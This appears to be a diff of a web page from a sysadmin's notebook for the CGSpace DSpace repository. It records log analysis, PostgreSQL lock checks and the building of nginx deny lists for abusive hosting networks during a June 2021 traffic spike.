                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -965
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1098
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1375
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -1135
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -969
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            # for num in {10..26}; do echo "2021-06-$num"; zcat /var/log/nginx/rest.*.gz | grep "$num/Jun/2021" | awk '{print $1}' | sort | uniq | wc -l; done
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1183
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-12
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +911
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-16
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1208
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-17
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-18
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +965
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-19
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +854
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1098
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1375
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +1135
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-25
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +969
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2021-06-26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +904
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • According to goaccess, the traffic spike started at 2AM (remember that the first “Pool empty” error in dspace.log was at 4:01AM):
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            # zcat /var/log/nginx/access.log.1[45].gz /var/log/nginx/library-access.log.1[45].gz | grep -E '23/Jun/2021' | goaccess --log-format=COMBINED -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              # zcat /var/log/nginx/access.log.1[45].gz /var/log/nginx/library-access.log.1[45].gz | grep -E '23/Jun/2021' | goaccess --log-format=COMBINED -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Moayad sent a fix for the add missing items plugins issue (#107)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • It works MUCH faster because it correctly identifies the missing handles in each repository
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • @@ -311,19 +311,19 @@ $ ./ilri/agrovoc-lookup.py -i /tmp/2021-07-06-all-subjects.txt -o /tmp/2021-07-0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -2302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -2564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -2530
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +2302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +2564
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +2530
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • The locks are held by XMLUI, not REST API or OAI:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     57 dspaceApi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   2671 dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     57 dspaceApi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   2671 dspaceWeb
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I ran all updates on the server (linode18) and restarted it, then DSpace came back up
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I sent a message to Atmire, as I never heard from them last week when we blocked access to the REST API for two days for them to investigate the server issues
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Clone the openrxv-items-temp index on AReS and re-run all the plugins, but most of the “dspace_add_missing_items” tasks failed so I will just run a full re-harvest
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • @@ -338,31 +338,31 @@ postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_ac
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                # grepcidr 91.243.191.0/24 /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     32 91.243.191.124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     33 91.243.191.129
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     33 91.243.191.200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     34 91.243.191.115
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     34 91.243.191.154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     34 91.243.191.234
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     34 91.243.191.56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     35 91.243.191.187
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     35 91.243.191.91
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     36 91.243.191.58
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     37 91.243.191.209
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     39 91.243.191.119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     39 91.243.191.144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     39 91.243.191.55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     40 91.243.191.112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     40 91.243.191.182
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     40 91.243.191.57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     40 91.243.191.98
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     41 91.243.191.106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     44 91.243.191.79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     45 91.243.191.151
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     46 91.243.191.103
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -     56 91.243.191.172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  # grepcidr 91.243.191.0/24 /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     32 91.243.191.124
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     33 91.243.191.129
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     33 91.243.191.200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     34 91.243.191.115
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     34 91.243.191.154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     34 91.243.191.234
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     34 91.243.191.56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     35 91.243.191.187
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     35 91.243.191.91
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     36 91.243.191.58
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     37 91.243.191.209
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     39 91.243.191.119
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     39 91.243.191.144
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     39 91.243.191.55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     40 91.243.191.112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     40 91.243.191.182
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     40 91.243.191.57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     40 91.243.191.98
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     41 91.243.191.106
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     44 91.243.191.79
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     45 91.243.191.151
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     46 91.243.191.103
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +     56 91.243.191.172
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ ./asn -n 45.80.217.235  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -╭──────────────────────────────╮
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -│ ASN lookup for 45.80.217.235 │
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -╰──────────────────────────────╯
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  - 45.80.217.235 ┌PTR -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├ASN 46844 (ST-BGP, US)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├ORG Sharktech
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├NET 45.80.217.0/24 (TrafficTransitSolutionNet)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├ABU info@traffictransitsolution.us
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├ROA ✓ VALID (1 ROA found)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├TYP  Proxy host   Hosting/DC 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               ├GEO Los Angeles, California (US)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -               └REP ✓ NONE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ ./asn -n 45.80.217.235  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +╭──────────────────────────────╮
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +│ ASN lookup for 45.80.217.235 │
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +╰──────────────────────────────╯
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    + 45.80.217.235 ┌PTR -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├ASN 46844 (ST-BGP, US)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├ORG Sharktech
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├NET 45.80.217.0/24 (TrafficTransitSolutionNet)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├ABU info@traffictransitsolution.us
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├ROA ✓ VALID (1 ROA found)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├TYP  Proxy host   Hosting/DC 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├GEO Los Angeles, California (US)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               └REP ✓ NONE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Slowly slowly I manually built up a list of the IPs, ISP names, and network blocks, for example:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    IP, Organization, Website, Network
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -496,56 +496,56 @@ postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_ac
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                # grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" /var/log/nginx/access.log | awk '{print $1}' | sort | uniq  > /tmp/ips-sorted.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# wc -l /tmp/ips-sorted.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -10776 /tmp/ips-sorted.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  # grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" /var/log/nginx/access.log | awk '{print $1}' | sort | uniq  > /tmp/ips-sorted.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# wc -l /tmp/ips-sorted.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +10776 /tmp/ips-sorted.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Then resolve them all:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips-sorted.txt -o /tmp/out.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Then get the top 10 organizations and top ten ASNs:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ csvcut -c 2 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    213 AMAZON-AES
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    218 ASN-QUADRANET-GLOBAL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    246 Silverstar Invest Limited
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    347 Ethiopian Telecommunication Corporation
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    475 DEDIPATH-LLC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    504 AS-COLOCROSSING
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    598 UAB Rakrejus
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    814 UGB Hosting OU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   1010 ST-BGP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   1757 Global Layer B.V.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ csvcut -c 3 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    213 14618
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    218 8100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    246 35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    347 24757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    475 35913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    504 36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    598 62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    814 206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   1010 46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   1757 49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ csvcut -c 2 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    213 AMAZON-AES
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    218 ASN-QUADRANET-GLOBAL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    246 Silverstar Invest Limited
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    347 Ethiopian Telecommunication Corporation
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    475 DEDIPATH-LLC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    504 AS-COLOCROSSING
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    598 UAB Rakrejus
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    814 UGB Hosting OU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   1010 ST-BGP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   1757 Global Layer B.V.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ csvcut -c 3 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    213 14618
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    218 8100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    246 35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    347 24757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    475 35913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    504 36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    598 62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    814 206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   1010 46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   1757 49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I will download blocklists for all these except Ethiopian Telecom, Quadranet, and Amazon, though I’m concerned about Global Layer because it’s a huge ASN that seems to have legit hosts too…?
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ wget https://asn.ipinfo.app/api/text/nginx/AS49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wget https://asn.ipinfo.app/api/text/nginx/AS46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wget https://asn.ipinfo.app/api/text/nginx/AS206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wget https://asn.ipinfo.app/api/text/nginx/AS62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wget https://asn.ipinfo.app/api/text/nginx/AS36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wget https://asn.ipinfo.app/api/text/nginx/AS35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ cat AS* | sort | uniq > /tmp/abusive-networks.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wc -l /tmp/abusive-networks.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -2276 /tmp/abusive-networks.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ wget https://asn.ipinfo.app/api/text/nginx/AS49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wget https://asn.ipinfo.app/api/text/nginx/AS46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wget https://asn.ipinfo.app/api/text/nginx/AS206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wget https://asn.ipinfo.app/api/text/nginx/AS62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wget https://asn.ipinfo.app/api/text/nginx/AS36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wget https://asn.ipinfo.app/api/text/nginx/AS35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ cat AS* | sort | uniq > /tmp/abusive-networks.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wc -l /tmp/abusive-networks.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +2276 /tmp/abusive-networks.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Combining with my existing rules and filtering uniques:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ cat roles/dspace/templates/nginx/abusive-networks.conf.j2 /tmp/abusive-networks.txt | grep deny | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -2298
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ cat roles/dspace/templates/nginx/abusive-networks.conf.j2 /tmp/abusive-networks.txt | grep deny | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +2298
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • According to Scamalytics all these are high risk ISPs (as recently as 2021-06) so I will just keep blocking them
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • I deployed the block list on CGSpace (linode18) and the load is down to 1.0 but I see there are still some DDoS IPs getting through… sigh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • The next thing I need to do is purge all the IPs from Solr using grepcidr…
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • @@ -558,12 +558,12 @@ $ wc -l /tmp/abusive-networks.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ sudo zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 | grep -E " (200|499) " | awk '{print $1}' | sort | uniq > /tmp/all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips.txt -o /tmp/all-ips-out.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvgrep -c asn -r '^(206485|35624|36352|46844|49453|62282)$' /tmp/all-ips-out.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/all-ips-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ wc -l /tmp/all-ips-to-block.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -5095 /tmp/all-ips-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ sudo zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 | grep -E " (200|499) " | awk '{print $1}' | sort | uniq > /tmp/all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips.txt -o /tmp/all-ips-out.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvgrep -c asn -r '^(206485|35624|36352|46844|49453|62282)$' /tmp/all-ips-out.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/all-ips-to-block.txt
